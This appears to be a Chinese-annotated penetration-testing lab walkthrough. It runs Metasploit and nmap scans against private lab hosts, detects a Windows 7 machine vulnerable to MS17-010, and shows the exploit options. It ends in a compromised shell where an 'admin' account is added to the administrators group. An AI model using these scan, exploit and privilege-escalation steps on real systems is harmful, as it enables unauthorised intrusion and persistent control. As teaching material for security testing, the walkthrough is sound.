# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/a10networks_ax_directory_traversal 2014-01-28 normal No A10 Networks AX Loadbalancer Directory Traversal 1 auxiliary/scanner/snmp/aix_version normal No AIX SNMP Scanner Auxiliary Module 2 auxiliary/scanner/discovery/arp_sweep normal No ARP Sweep Local Network Discovery ... 614 auxiliary/scanner/rservices/rexec_login normal No rexec Authentication Scanner 615 auxiliary/scanner/rservices/rlogin_login normal No rlogin Authentication Scanner 616 auxiliary/scanner/rservices/rsh_login normal No rsh Authentication Scanner
Interact with a module by name or index. For example info 616, use 616 or use auxiliary/scanner/rservices/rsh_login 通过名称或者索引与模块交互。例如: info 616, use 616 或者 use auxiliary/scanner/rservices/rsh_login
# 使用 syn 模块 msf6 > use auxiliary/scanner/portscan/syn # 显示参数 msf6 auxiliary(scanner/portscan/syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 500 yes The reply read timeout in milliseconds # 设置目标主机 IP msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.80.1 RHOSTS => 192.168.80.1 # 设置线程数 msf6 auxiliary(scanner/portscan/syn) > set THREADS 40 THREADS => 40 # 再次查看设置参数 msf6 auxiliary(scanner/portscan/syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.80.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit SNAPLEN 65535 yes The number of bytes to capture THREADS 40 yes The number of concurrent threads (max one per host) TIMEOUT 500 yes The reply read timeout in milliseconds # 启动信息收集 msf6 auxiliary(scanner/portscan/syn) > run [+] TCP OPEN 192.168.80.1:135 [+] TCP OPEN 192.168.80.1:139 [+] TCP OPEN 192.168.80.1:443 [+] TCP OPEN 192.168.80.1:445 [+] TCP OPEN 192.168.80.1:1433 [+] TCP OPEN 192.168.80.1:3306 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 15:10 CST Nmap scan report for localhost (192.168.80.1) Host is up (0.00077s latency). Not shown: 994 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2095 3306/tcp open mysql MySQL 5.7.31-log MAC Address: 00:50:56:C0:00:08 (VMware) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 已执行服务检测。请向 https://nmap.org/submit/ 报告任何不正常的结果。 Nmap done: 1 IP address (1 host up) scanned in 17.86 seconds Nmap完成:在 17.86 秒内扫描了1个 IP 地址。
Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/na yes List of named pipes to check med_pipes.txt RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo it RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) # 设置目标主机IP msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.80.1 RHOSTS => 192.168.80.1 # 确认参数信息 msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/na yes List of named pipes to check med_pipes.txt RHOSTS 192.168.80.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo it RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) # 执行探测(目标主机 windows11 ) msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.80.1:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [*] 192.168.80.1:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
1 2 3 4 5 6
# 执行探测(目标主机 windows7) msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.80.130:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit) [*] 192.168.80.130:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Win dows 7, Windows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Wi ndows Embedded Standard 7 target machines.
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.80.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Win dows 7, Windows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Wi ndows Embedded Standard 7 target machines.
# 查看当前所有用户 C:\Users\root\Documents>net user net user
User accounts for \\
------------------------------------------------------------------------------- admin Administrator ghost Guest root ying The command completed with one or more errors. # 添加 admin 用户 C:\Users\root\Documents>net user admin net user admin User name admin Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set 2022/11/28 1:11:57 Password expires 2023/1/9 1:11:57 Password changeable 2022/11/28 1:11:57 Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships *Users Global Group memberships *None The command completed successfully. # 查看 root 用户信息 C:\Users\root\Documents>net user root net user root User name root Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set 2022/11/27 23:31:04 Password expires Never Password changeable 2022/11/27 23:31:04 Password required No User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 2022/11/28 1:08:41
Logon hours allowed All
Local Group Memberships *Administrators Global Group memberships *None The command completed successfully. # 添加 admin 用户至 administrators 用户组,获取最高权限 C:\Users\root\Documents>net localgroup administrators admin /add net localgroup administrators admin /add The command completed successfully. # 查看 admin 用户信息 C:\Users\root\Documents>net user admin net user admin User name admin Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set 2022/11/28 1:11:57 Password expires 2023/1/9 1:11:57 Password changeable 2022/11/28 1:11:57 Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully.
